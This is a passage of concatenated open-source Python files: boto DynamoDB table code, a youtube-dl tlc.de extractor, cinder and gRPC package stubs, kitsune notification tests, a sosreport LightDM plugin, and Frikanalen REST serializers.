        #   in chunks of 100 (the batch_get_item limit) by __iter__.
        self.table = table
        self.keys = keys
        self.consumed_units = 0
        self.attributes_to_get = attributes_to_get
        self.consistent_read = consistent_read

    def _queue_unprocessed(self, res):
        """Re-append any keys the service reported as unprocessed."""
        if u'UnprocessedKeys' not in res:
            return
        if self.table.name not in res[u'UnprocessedKeys']:
            return

        keys = res[u'UnprocessedKeys'][self.table.name][u'Keys']
        for key in keys:
            h = key[u'HashKeyElement']
            r = key[u'RangeKeyElement'] if u'RangeKeyElement' in key else None
            self.keys.append((h, r))

    def __iter__(self):
        # Yield items batch by batch until every key has been processed.
        while self.keys:
            # Build the next batch
            batch = BatchList(self.table.layer2)
            batch.add_batch(self.table, self.keys[:100],
                            self.attributes_to_get)
            res = batch.submit()

            # parse the results
            # NOTE(review): if the table name is absent from Responses,
            # `continue` retries without trimming self.keys -- presumably
            # the service eventually responds, but this looks like it
            # could loop indefinitely; confirm against the API behavior.
            if self.table.name not in res[u'Responses']:
                continue

            self.consumed_units += res[u'Responses'][self.table.name][u'ConsumedCapacityUnits']
            for elem in res[u'Responses'][self.table.name][u'Items']:
                yield elem

            # re-queue un processed keys
            self.keys = self.keys[100:]
            self._queue_unprocessed(res)
class Table(object):
"""
An Amazon DynamoDB table.
:ivar name: The name of the table.
:ivar create_time: The date and time that the table was created.
:ivar status: The current status of the table. One of:
'ACTIVE', 'UPDATING', 'DELETING'.
:ivar schema: A :class:`boto.dynamodb.schema.Schema` object representing
the schema defined for the table.
:ivar item_count: The number of items in the table. This value is
set only when the Table object is created or refreshed and
may not reflect the actual count.
:ivar size_bytes: Total size of the specified table, in bytes.
Amazon DynamoDB updates this value approximately every six hours.
Recent changes might not be reflected in this value.
:ivar read_units: The ReadCapacityUnits of the tables
Provisioned Throughput.
:ivar write_units: The WriteCapacityUnits of the tables
Provisioned Throughput.
:ivar schema: The Schema object associated with the table.
"""
def __init__(self, layer2, response):
"""
:type layer2: :class:`boto.dynamodb.layer2.Layer2`
:param layer2: A `Layer2` api object.
:type response: dict
:param response: The output of
`boto.dynamodb.layer1.Layer1.describe_table`.
"""
self.layer2 = layer2
self._dict = {}
self.update_from_response(response)
@classmethod
def create_from_schema(cls, layer2, name, schema):
"""Create a Table object.
If you know the name and schema of your table, you can
create a ``Table`` object without having to make any
API calls (normally an API call is made to retrieve
the schema of a table).
Example usage::
table = Table.create_from_schema(
boto.connect_dynamodb(),
'tablename',
Schema.create(hash_key=('keyname', 'N')))
:type layer2: :class:`boto.dynamodb.layer2.Layer2`
:param layer2: A ``Layer2`` api object.
:type name: str
:param name: The name of the table.
:type schema: :class:`boto.dynamodb.schema.Schema`
:param schema: The schema associated with the table.
:rtype: :class:`boto.dynamodb.table.Table`
:return: A Table object representing the table.
"""
table = cls(layer2, {'Table': {'TableName': name}})
table._schema = schema
return table
def __repr__(self):
return 'Table(%s)' % self.name
@property
def name(self):
return self._dict['TableName']
@property
def create_time(self):
return self._dict.get('CreationDateTime', None)
@property
def status(self):
return self._dict.get('TableStatus', None)
@property
def item_count(self):
return self._dict.get('ItemCount', 0)
@property
def size_bytes(self):
return self._dict.get('TableSizeBytes', 0)
@property
def schema(self):
return self._schema
@property
def read_units(self):
try:
return self._dict['ProvisionedThroughput']['ReadCapacityUnits']
except KeyError:
return None
@property
def write_units(self):
try:
return self._dict['ProvisionedThroughput']['WriteCapacityUnits']
except KeyError:
return None
def update_from_response(self, response):
"""
Update the state of the Table object based on the response
data received from Amazon DynamoDB.
"""
# 'Table' is from a describe_table call.
if 'Table' in response:
self._dict.update(response['Table'])
# 'TableDescription' is from a create_table call.
elif 'TableDescription' in response:
self._dict.update(response['TableDescription'])
if 'KeySchema' in self._dict:
self._schema = Schema(self._dict['KeySchema'])
def refresh(self, wait_for_active=False, retry_seconds=5):
"""
Refresh all of the fields of the Table object by calling
the underlying DescribeTable request.
:type wait_for_active: bool
:param wait_for_active: If True, this command will not return
until the table status, as returned from Amazon DynamoDB, is
'ACTIVE'.
:type retry_seconds: int
:param retry_seconds: If wait_for_active is True, this
parameter controls the number of seconds of delay between
calls to update_table in Amazon DynamoDB. Default is 5 seconds.
"""
done = False
while not done:
response = self.layer2.describe_table(self.name)
self.update_from_response(response)
if wait_for_active:
if self.status == 'ACTIVE':
done = True
else:
time.sleep(retry_seconds)
else:
done = True
def update_throughput(self, read_units, write_units):
"""
Update the ProvisionedThroughput for the Amazon DynamoDB Table.
:type read_units: int
:param read_units: The new value for ReadCapacityUnits.
:type write_units: int
:param write_units: The new value for WriteCapacityUnits.
"""
self.layer2.update_throughput(self, read_units, write_units)
def delete(self):
"""
Delete this table and all items in it. After calling this
the Table objects status attribute will be set to 'DELETING'.
"""
self.layer2.delete_table(self)
def get_item(self, hash_key, range_key=None,
attributes_to_get=None, consistent_read=False,
item_class=Item):
"""
Retrieve an existing item from the table.
:type hash_key: int|long|float|str|unicode|Binary
:param hash_key: The HashKey of the requested item. The
type of the value must match the type defined in the
schema for the table.
:type range_key: int|long|float|str|unicode|Binary
:param range_key: The optional RangeKey of the requested item.
The type of the value must match the type defined in the
schema for the table.
:type attributes_to_get: list
:param attributes_to_get: A list of attribute names.
If supplied, only the specified attribute names will
be returned. Otherwise, all attributes will be returned.
:type consistent_read: bool
:param consistent_read: If True, a consistent read
request is issued. Otherwise, an eventually consistent
request is issued.
:type item_class: Class
:param item_class: Allows you to override the class used
to generate the items. This should be a subclass of
:class:`boto.dynamodb.item.Item`
"""
return self.layer2.get_item(self, hash_key, range_key,
attributes_to_get, consistent_read,
item_class)
lookup = get_item
def has_item(self, hash_key, range_key=None, consistent_read=False):
"""
Checks the table to see if the Item with the specified ``hash_key``
exists. This may save a tiny bit of time/bandwidth over a
straight :py:meth:`get_item` if you have no intention to touch
the data that is returned, since this method specifically tells
Amazon not to return anything but the Item's key.
:type hash_key: int|long|float|str|unicode|Binary
:param hash_key: The HashKey of the requested item. The
type of the value must match the type defined in the
schema for the table.
:type range_key: int|long|float|str|unicode|Binary
:param range_key: The optional RangeKey of the requested item.
The type of the value must match the type defined in the
schema for the table.
:type consistent_read: bool
:param consistent_read: If True, a consistent read
request is issued. Otherwise, an eventually consistent
request is issued.
:rtype: bool
:returns: ``True`` if the Item exists, ``False`` if not.
"""
try:
# Attempt to get the key. If it can't be found, it'll raise
# an exception.
self.get_item(hash_key, range_key=range_key,
# This minimizes the size of the response body.
attributes_to_get=[hash_key],
consistent_read=consistent_read)
except dynamodb_exceptions.DynamoDBKeyNotFoundError:
# Key doesn't exist.
return False
return True
def new_item(self, hash_key=None, range_key=None, attrs=None,
item_class=Item):
"""
Return an new, unsaved Item which can later be PUT to
Amazon DynamoDB.
This method has explicit (but optional) parameters for
the hash_key and range_key values of the item. You can use
these explicit parameters when calling the method, such as::
>>> my_item = my_table.new_item(hash_key='a', range_key=1,
attrs={'key1': 'val1', 'key2': 'val2'})
>>> my_item
{u'bar': 1, u'foo': 'a', 'key1': 'val1', 'key2': 'val2'}
Or, if you prefer, you can simply put the hash_key and range_key
in the attrs dictionary itself, like this::
>>> attrs = {'foo': 'a', 'bar': 1, 'key1': 'val1', 'key2': 'val2'}
>>> my_item = my_table.new_item(attrs=attrs)
>>> my_item
{u'bar': 1, u'foo': 'a', 'key1': 'val1', 'key2': 'val2'}
The effect is the same.
.. note:
The explicit parameters take priority over the values in
the attrs dict. So, if you have a hash_key or range_key
in the attrs dict and you also supply either or both using
the explicit parameters, the values in the attrs will be
ignored.
:type hash_key: int|long|float|str|unicode|Binary
:param hash_key: The HashKey of the new item. The
type of the value must match the type defined in the
schema for the table.
:type range_key: int|long|float|str|unicode|Binary
:param range_key: The optional RangeKey of the new item.
The type of the value must match the type defined in the
schema for the table.
:type attrs: dict
:param attrs: A dictionary of key value pairs used to
populate the new item.
:type item_class: Class
:param item_class: Allows you to override the class used
to generate the items. This should be a subclass of
:class:`boto.dynamodb.item.Item`
"""
return item_class(self, hash_key, range_key, attrs)
def query(self, hash_key, *args, **kw):
    """
    Perform a query on the table.

    :type hash_key: int|long|float|str|unicode|Binary
    :param hash_key: The HashKey of the requested item.  The
        type of the value must match the type defined in the
        schema for the table.

    :type range_key_condition: :class:`boto.dynamodb.condition.Condition`
    :param range_key_condition: A Condition object.
        Condition object can be one of the following types:

        EQ|LE|LT|GE|GT|BEGINS_WITH|BETWEEN

        The only condition which expects or will accept two
        values is 'BETWEEN', otherwise a single value should
        be passed to the Condition constructor.

    :type attributes_to_get: list
    :param attributes_to_get: A list of attribute names.
        If supplied, only the specified attribute names will
        be returned.  Otherwise, all attributes will be returned.

    :type request_limit: int
    :param request_limit: The maximum number of items to retrieve
        from Amazon DynamoDB on each request.  You may want to set
        a specific request_limit based on the provisioned throughput
        of your table.  The default behavior is to retrieve as many
        results as possible per request.

    :type max_results: int
    :param max_results: The maximum number of results that will
        be retrieved from Amazon DynamoDB in total.  For example,
        if you only wanted to see the first 100 results from the
        query, regardless of how many were actually available, you
        could set max_results to 100 and the generator returned
        from the query method will only yield 100 results max.

    :type consistent_read: bool
    :param consistent_read: If True, a consistent read
        request is issued.  Otherwise, an eventually consistent
        request is issued.

    :type scan_index_forward: bool
    :param scan_index_forward: Specified forward or backward
        traversal of the index.  Default is forward (True).

    :type exclusive_start_key: list or tuple
    :param exclusive_start_key: Primary key of the item from
        which to continue an earlier query.  This would be
        provided as the LastEvaluatedKey in that query.

    :type count: bool
    :param count: If True, Amazon DynamoDB returns a total
        number of items for the Query operation, even if the
        operation has no matching items for the assigned filter.
        If count is True, the actual items are not returned and
        the count is accessible as the ``count`` attribute of
        the returned object.

    :type item_class: Class
    :param item_class: Allows you to override the class used
        to generate the items. This should be a subclass of
        :class:`boto.dynamodb.item.Item`
    """
    # The table object only forwards to the layer2 API, passing itself
    # along so the layer can resolve schema details.
    return self.layer2.query(self, hash_key, *args, **kw)
def scan(self, *args, **kw):
    """
    Scan through this table.  This is a very long and expensive
    operation, and should be avoided if at all possible.

    :type scan_filter: A dict
    :param scan_filter: A dictionary where the key is the
        attribute name and the value is a
        :class:`boto.dynamodb.condition.Condition` object.
        Valid Condition objects include:

         * EQ - equal (1)
         * NE - not equal (1)
         * LE - less than or equal (1)
         * LT - less than (1)
         * GE - greater than or equal (1)
         * GT - greater than (1)
         * NOT_NULL - attribute exists (0, use None)
         * NULL - attribute does not exist (0, use None)
         * CONTAINS - substring or value in list (1)
         * NOT_CONTAINS - absence of substring or value in list (1)
         * BEGINS_WITH - substring prefix (1)
         * IN - exact match in list (N)
         * BETWEEN - >= first value, <= second value (2)

    :type attributes_to_get: list
    :param attributes_to_get: A list of attribute names.
        If supplied, only the specified attribute names will
        be returned.  Otherwise, all attributes will be returned.

    :type request_limit: int
    :param request_limit: The maximum number of items to retrieve
        from Amazon DynamoDB on each request.  You may want to set
        a specific request_limit based on the provisioned throughput
        of your table.  The default behavior is to retrieve as many
        results as possible per request.

    :type max_results: int
    :param max_results: The maximum number of results that will
        be retrieved from Amazon DynamoDB in total.  For example,
        if you only wanted to see the first 100 results from the
        scan, regardless of how many were actually available, you
        could set max_results to 100 and the generator returned
        from the scan method will only yield 100 results max.

    :type count: bool
    :param count: If True, Amazon DynamoDB returns a total
        number of items for the Scan operation, even if the
        operation has no matching items for the assigned filter.
        If count is True, the actual items are not returned and
        the count is accessible as the ``count`` attribute of
        the returned object.

    :type exclusive_start_key: list or tuple
    :param exclusive_start_key: Primary key of the item from
        which to continue an earlier query.  This would be
        provided as the LastEvaluatedKey in that query.

    :type item_class: Class
    :param item_class: Allows you to override the class used
        to generate the items. This should be a subclass of
        :class:`boto.dynamodb.item.Item`

    :return: A TableGenerator (generator) object which will iterate
        over all results
    :rtype: :class:`boto.dynamodb.layer2.TableGenerator`
    """
    # Delegate to the layer2 API, passing this table along for schema info.
    return self.layer2.scan(self, *args, **kw)
def batch_get_item(self, keys, attributes_to_get=None):
    """
    Return a set of attributes for multiple items from a single table
    using their primary keys. This abstraction removes the 100 Items per
    batch limitations as well as the "UnprocessedKeys" logic.

    :type keys: list
    :param keys: A list of scalar or tuple values.  Each element in the
        list represents one Item to retrieve.  If the schema for the
        table has both a HashKey and a RangeKey, each element in the
        list should be a tuple consisting of (hash_key, range_key).  If
        the schema for the table contains only a HashKey, each element
        in the list should be a scalar value of the appropriate type
        for the table schema.  NOTE: The maximum number of items that
        can be retrieved for a single operation is 100. Also, the
        number of items retrieved is constrained by a 1 MB size limit.

    :type attributes_to_get: list
    :param attributes_to_get: A list of attribute names.
        If supplied, only the specified attribute names will
        be returned.  Otherwise, all attributes will be returned.

    :return: A TableBatchGenerator (generator) object which will
        iterate over all results
    :rtype: :class:`boto.dynamodb.table.TableBatchGenerator`
    """
    # The generator handles batching and retrying of unprocessed keys.
    return TableBatchGenerator(self, keys, attributes_to_get)
| apache-2.0 |
dannyperry571/theapprentice | script.module.youtube.dl/lib/youtube_dl/extractor/tlc.py | 12 | 1644 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from .brightcove import BrightcoveLegacyIE
from ..compat import (
compat_parse_qs,
compat_urlparse,
)
class TlcDeIE(InfoExtractor):
    """Extractor for video pages on tlc.de (German TLC site)."""
    IE_NAME = 'tlc.de'
    # The numeric Brightcove video id, when present, lives in the URL
    # fragment (e.g. .../videos/#3235167922001).
    _VALID_URL = r'https?://(?:www\.)?tlc\.de/(?:[^/]+/)*videos/(?P<title>[^/?#]+)?(?:.*#(?P<id>\d+))?'
    _TEST = {
        'url': 'http://www.tlc.de/sendungen/breaking-amish/videos/#3235167922001',
        'info_dict': {
            'id': '3235167922001',
            'ext': 'mp4',
            'title': 'Breaking Amish: Die Welt da draußen',
            'description': (
                'Vier Amische und eine Mennonitin wagen in New York'
                ' den Sprung in ein komplett anderes Leben. Begleitet sie auf'
                ' ihrem spannenden Weg.'),
            'timestamp': 1396598084,
            'upload_date': '20140404',
            'uploader_id': '1659832546',
        },
    }
    # New-style Brightcove player URL; %s is filled with the video id.
    BRIGHTCOVE_URL_TEMPLATE = 'http://players.brightcove.net/1659832546/default_default/index.html?videoId=%s'

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        brightcove_id = mobj.group('id')
        if not brightcove_id:
            # No id in the URL fragment: download the page, locate the
            # legacy Brightcove embed, and pull the id out of its
            # '@videoPlayer' query parameter.
            title = mobj.group('title')
            webpage = self._download_webpage(url, title)
            brightcove_legacy_url = BrightcoveLegacyIE._extract_brightcove_url(webpage)
            brightcove_id = compat_parse_qs(compat_urlparse.urlparse(
                brightcove_legacy_url).query)['@videoPlayer'][0]
        # Hand off to the BrightcoveNew extractor via the player URL.
        return self.url_result(self.BRIGHTCOVE_URL_TEMPLATE % brightcove_id,
                               'BrightcoveNew', brightcove_id)
| gpl-2.0 |
eharney/cinder | cinder/backup/__init__.py | 6 | 1026 | # Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Importing full names to not pollute the namespace and cause possible
# collisions with use of 'from cinder.backup import <foo>' elsewhere.
from oslo_utils import importutils
from cinder.common import config
CONF = config.CONF
def API(*args, **kwargs):
    """Instantiate and return the configured backup API implementation.

    The concrete class is named by the ``backup_api_class`` config option;
    all positional and keyword arguments are forwarded to its constructor.
    """
    class_name = CONF.backup_api_class
    return importutils.import_object(class_name, *args, **kwargs)
| apache-2.0 |
podsvirov/grpc | src/python/grpcio/grpc/framework/interfaces/face/__init__.py | 1496 | 1530 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| bsd-3-clause |
philipp-sumo/kitsune | kitsune/messages/tests/test_notifications.py | 17 | 2514 | from django.contrib.sites.models import Site
from django.core import mail
import mock
from kitsune.kbforums.tests import KBForumTestCase
from kitsune.sumo.tests import post, attrs_eq, starts_with
from kitsune.users.models import Setting
from kitsune.users.tests import user
PRIVATE_MESSAGE_EMAIL = '{sender} sent you the following'
class NotificationsTests(KBForumTestCase):
    """Test that private-message email notifications get sent."""

    def setUp(self):
        super(NotificationsTests, self).setUp()
        # Fixed sender/recipient pair reused by both tests.
        self.sender = user(username=u'Alice', save=True)
        self.to = user(username=u'Bob', save=True)

    @mock.patch.object(Site.objects, 'get_current')
    def test_private_message_sends_email(self, get_current):
        """
        With the email_private_messages setting enabled, receiving a
        private message should send an email.
        """
        get_current.return_value.domain = 'testserver'
        # Enable the recipient's notification setting.
        s, c = Setting.objects.get_or_create(user=self.to,
                                             name='email_private_messages')
        s.value = True
        s.save()
        # User has setting, and should recieve notification email.
        assert Setting.get_for_user(self.to, 'email_private_messages')
        self.client.login(username=self.sender.username, password='testpass')
        post(self.client, 'messages.new',
             {'to': self.to, 'message': 'a message'})
        # The outgoing mail must be addressed to the recipient and name
        # the sender in both subject and body.
        subject = u'[SUMO] You have a new private message from [{sender}]'
        attrs_eq(mail.outbox[0], to=[self.to.email],
                 subject=subject.format(sender=self.sender.username))
        starts_with(mail.outbox[0].body,
                    PRIVATE_MESSAGE_EMAIL.format(sender=self.sender.username))

    @mock.patch.object(Site.objects, 'get_current')
    def test_private_message_not_sends_email(self, get_current):
        """
        With the setting disabled, receiving a private message should not
        send any email.
        """
        get_current.return_value.domain = 'testserver'
        s, c = Setting.objects.get_or_create(user=self.to,
                                             name='email_private_messages')
        # Now user should not recieve email.
        s.value = False
        s.save()
        assert not Setting.get_for_user(self.to, 'email_private_messages')
        self.client.login(username=self.sender.username, password='testpass')
        post(self.client, 'messages.new',
             {'to': self.to, 'message': 'a message'})
        # Nothing should have been queued for delivery.
        assert not mail.outbox
pierg75/pier-sosreport | sos/plugins/lightdm.py | 2 | 1737 | # Copyright (C) 2015 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
class LightDm(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
    """Light Display Manager
    """

    packages = ('lightdm', )
    profiles = ('desktop', )
    plugin_name = 'lightdm'

    def setup(self):
        # Collect service status plus the unit's journal output.
        self.add_cmd_output("systemctl status lightdm.service")
        self.add_journal(units="lightdm")
        # Configuration files are always collected.
        self.add_copy_spec([
            "/etc/lightdm/lightdm.conf",
            "/etc/lightdm/users.conf"
        ])
        if not self.get_option("all_logs"):
            # Cap individual log files at the configured size limit.
            limit = self.get_option("log_size")
            self.add_copy_spec("/var/log/lightdm/lightdm.log", sizelimit=limit)
            self.add_copy_spec("/var/log/lightdm/x-0-greeter.log",
                               sizelimit=limit)
            self.add_copy_spec("/var/log/lightdm/x-0.log", sizelimit=limit)
        else:
            # all_logs requested: grab the whole log directory uncapped.
            self.add_copy_spec("/var/log/lightdm")
| gpl-2.0 |
Frikanalen/frikanalen | packages/fkweb/api/serializers.py | 1 | 12070 | # Copyright (c) 2012-2013 Benjamin Bruheim <grolgh@gmail.com>
# This file is covered by the LGPLv3 or later, read COPYING for details.
from django.conf import settings
from django.contrib.auth import get_user_model
from rest_framework import serializers
from rest_framework.authtoken.models import Token
import logging
import pytz
from fk.models import AsRun
from fk.models import Category
from fk.models import Organization
from fk.models import Scheduleitem
from fk.models import Video
from fk.models import User
from fk.models import VideoFile
logger = logging.getLogger(__name__)
class OrganizationSerializer(serializers.ModelSerializer):
    """Organization representation with derived editor contact fields.

    ``editor_name``, ``editor_email`` and ``editor_msisdn`` are computed
    from the related editor user; they are None when no editor is set.
    """
    editor_name = serializers.SerializerMethodField()
    editor_email = serializers.SerializerMethodField()
    editor_msisdn = serializers.SerializerMethodField()
    fkmember = serializers.BooleanField(read_only=True)

    def get_editor_email(self, obj):
        """Return the editor's email address, or None without an editor."""
        if obj.editor:
            return obj.editor.email
        return None

    def get_editor_msisdn(self, obj):
        """Return the editor's phone number in international format.

        Falls back to '' when the number cannot be rendered, and None
        when the organization has no editor.
        """
        if obj.editor:
            try:
                return obj.editor.phone_number.as_international
            # Was a bare ``except:``; narrowed so KeyboardInterrupt /
            # SystemExit are no longer swallowed.
            except Exception:
                return ''
        return None

    def get_editor_name(self, obj):
        """Return the editor's full name, or a placeholder when unset."""
        if obj.editor:
            return obj.editor.first_name + " " + obj.editor.last_name
        # Lazy %-args: the string is only interpolated if the record is
        # actually emitted.
        logger.warning('Organization %d has no editor assigned', obj.id)
        return 'Ingen redaktør!'

    class Meta:
        model = Organization
        fields = (
            'id',
            'name',
            'homepage',
            'description',
            'postal_address',
            'street_address',
            'editor_id',
            'editor_name',
            'editor_email',
            'editor_msisdn',
            'fkmember',
        )
class VideoFileSerializer(serializers.ModelSerializer):
    """Plain model serializer exposing a VideoFile's metadata fields."""

    class Meta:
        model = VideoFile
        fields = (
            "id",
            "video",
            "format",
            "filename",
            "created_time",
            "integrated_lufs",
            "truepeak_lufs",
        )
class VideoSerializer(serializers.ModelSerializer):
    """Full Video representation, including per-format file URLs.

    ``organization`` is nested and read-only; ``creator`` defaults to the
    requesting user and is referenced by email; ``categories`` are
    referenced by name.
    """
    organization = OrganizationSerializer(read_only=True)
    creator = serializers.SlugRelatedField(
        slug_field='email', queryset=get_user_model().objects.all(),
        default=serializers.CurrentUserDefault())
    categories = serializers.SlugRelatedField(
        slug_field='name', many=True, queryset=Category.objects.all())
    files = serializers.SerializerMethodField()

    def get_files(self, video):
        """Map each of the video's file formats to its public media URL."""
        file_list = {}
        for vf in VideoFile.objects.filter(video=video):
            file_list[vf.format.fsname] = (
                settings.FK_MEDIA_URLPREFIX + vf.location(relative=True))
        return file_list

    class Meta:
        model = Video
        # "files" was accidentally listed twice; deduplicated.
        fields = (
            "id",
            "name",
            "header",
            "description",
            "files",
            "creator",
            "organization",
            "duration",
            "categories",
            "framerate",
            "proper_import",
            "has_tono_records",
            "publish_on_web",
            "is_filler",
            "ref_url",
            "created_time",
            "updated_time",
            "uploaded_time",
            "ogv_url",
            "large_thumbnail_url",
        )
        read_only_fields = (
            "framerate", "created_time", "updated_time", "files")

    def validate(self, data):
        """On creation without an explicit organization, infer it from the
        creator -- but only when the creator belongs to exactly one."""
        is_creation = not self.instance
        if is_creation and not data.get('organization'):
            potential_orgs = data['creator'].organization_set.all()
            if len(potential_orgs) == 0:
                raise serializers.ValidationError(
                    {'organization': "Field required when "
                     "editor has no organization."})
            elif len(potential_orgs) > 1:
                raise serializers.ValidationError(
                    [{'organization': "Field required when "
                      "editor has more than one organization."}])
            data['organization'] = potential_orgs[0]
        return data
class VideoCreateSerializer(VideoSerializer):
    """Variant of VideoSerializer with a writable organization (by id)."""
    organization = serializers.SlugRelatedField(
        slug_field='id', queryset=Organization.objects.all(),
        required=False)
class VideoUploadTokenSerializer(serializers.ModelSerializer):
    """Exposes a video's upload token plus the site-wide upload endpoint."""
    upload_url = serializers.SerializerMethodField()

    def get_upload_url(self, video_upload_token):
        # The upload endpoint is a deployment setting, not per-video data.
        return settings.FK_UPLOAD_URL

    class Meta:
        model = Video
        fields = (
            'upload_token',
            'upload_url',
        )
class ScheduleitemVideoSerializer(serializers.ModelSerializer):
    """Compact Video representation embedded inside schedule items."""
    organization = OrganizationSerializer(read_only=True)
    creator = serializers.SlugRelatedField(
        slug_field='email', queryset=get_user_model().objects.all(),
        default=serializers.CurrentUserDefault())
    categories = serializers.SlugRelatedField(
        slug_field='name', many=True, queryset=Category.objects.all())

    class Meta:
        model = Video
        fields = (
            "id",
            "name",
            "header",
            "description",
            "creator",
            "organization",
            "duration",
            "categories",
        )
        # NOTE(review): none of these names appear in `fields` above, so
        # this entry looks like a copy-paste leftover -- confirm.
        read_only_fields = (
            "framerate", "created_time", "updated_time")
class ScheduleitemModifySerializer(serializers.ModelSerializer):
    """Writable schedule-item serializer with overlap validation.

    Times are interpreted/rendered in Europe/Oslo; ``endtime`` is derived
    and read-only.
    """
    starttime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'))
    endtime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'), read_only=True)

    class Meta:
        model = Scheduleitem
        fields = (
            "id",
            "video",
            "schedulereason",
            "starttime",
            "endtime",
            "duration"
        )

    def validate(self, data):
        """Reject items whose [start, start + duration) span overlaps an
        existing schedule item (the item itself is excluded)."""
        if 'starttime' in data or 'duration' in data:
            def g(v):
                # Fall back to the current instance's value on partial update.
                return self.instance and getattr(self.instance, v)
            start = data.get('starttime', g('starttime'))
            end = start + data.get('duration', g('duration'))
            # NOTE(review): expand_to_surrounding presumably widens the
            # window so neighbouring items are fetched -- confirm in the
            # Scheduleitem manager.
            sur_start, sur_end = (
                Scheduleitem.objects.expand_to_surrounding(start, end))
            items = (Scheduleitem.objects.exclude(pk=g('id'))
                     .filter(starttime__gte=sur_start, starttime__lte=sur_end)
                     .order_by('starttime'))
            for entry in items:
                # New item starts inside an existing one.
                if entry.starttime <= start < entry.endtime():
                    raise serializers.ValidationError(
                        {'duration': "Conflict with '%s'." % entry})
                # New item ends inside an existing one.
                if entry.starttime < end < entry.endtime():
                    raise serializers.ValidationError(
                        {'duration': "Conflict with '%s'." % entry})
        return data
class ScheduleitemReadSerializer(serializers.ModelSerializer):
    """Read-oriented schedule-item serializer with the video nested.

    NOTE(review): validate() below is a byte-for-byte duplicate of
    ScheduleitemModifySerializer.validate; consider extracting a shared
    helper.
    """
    video = ScheduleitemVideoSerializer()
    starttime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'))
    endtime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'), read_only=True)

    class Meta:
        model = Scheduleitem
        fields = (
            "id",
            "video",
            "schedulereason",
            "starttime",
            "endtime",
            "duration"
        )

    def validate(self, data):
        """Reject items whose span overlaps an existing schedule item."""
        if 'starttime' in data or 'duration' in data:
            def g(v):
                # Fall back to the current instance's value on partial update.
                return self.instance and getattr(self.instance, v)
            start = data.get('starttime', g('starttime'))
            end = start + data.get('duration', g('duration'))
            sur_start, sur_end = (
                Scheduleitem.objects.expand_to_surrounding(start, end))
            items = (Scheduleitem.objects.exclude(pk=g('id'))
                     .filter(starttime__gte=sur_start, starttime__lte=sur_end)
                     .order_by('starttime'))
            for entry in items:
                if entry.starttime <= start < entry.endtime():
                    raise serializers.ValidationError(
                        {'duration': "Conflict with '%s'." % entry})
                if entry.starttime < end < entry.endtime():
                    raise serializers.ValidationError(
                        {'duration': "Conflict with '%s'." % entry})
        return data
class AsRunSerializer(serializers.ModelSerializer):
    """Plain model serializer for playout as-run log entries."""

    class Meta:
        model = AsRun
        fields = (
            'id',
            'video',
            'program_name',
            'playout',
            'played_at',
            'in_ms',
            'out_ms',
        )
class TokenSerializer(serializers.ModelSerializer):
    """Serializer for DRF auth tokens (key, owner, creation time)."""

    class Meta:
        model = Token
        fields = (
            'created',
            'key',
            'user',
        )
class NewUserSerializer(serializers.ModelSerializer):
    """Registration serializer: creates a user with a hashed password."""
    password = serializers.CharField(write_only=True)
    # These two need to be explicitly included because
    # they are not required in the database model
    # but we want new users to have these values set
    first_name = serializers.CharField()
    last_name = serializers.CharField()
    date_of_birth = serializers.DateField()

    def create(self, validated_data):
        user = get_user_model().objects.create(
            email=validated_data['email'],
            first_name=validated_data['first_name'],
            last_name=validated_data['last_name'],
            date_of_birth=validated_data['date_of_birth']
        )
        # Hash the password rather than storing it verbatim.
        user.set_password(validated_data['password'])
        user.save()
        return user

    class Meta:
        model = User
        fields = (
            'id',
            'email',
            'first_name',
            'last_name',
            'date_of_birth',
            'password'
        )
        # NOTE(review): Meta.write_only_fields is ignored by DRF 3+; the
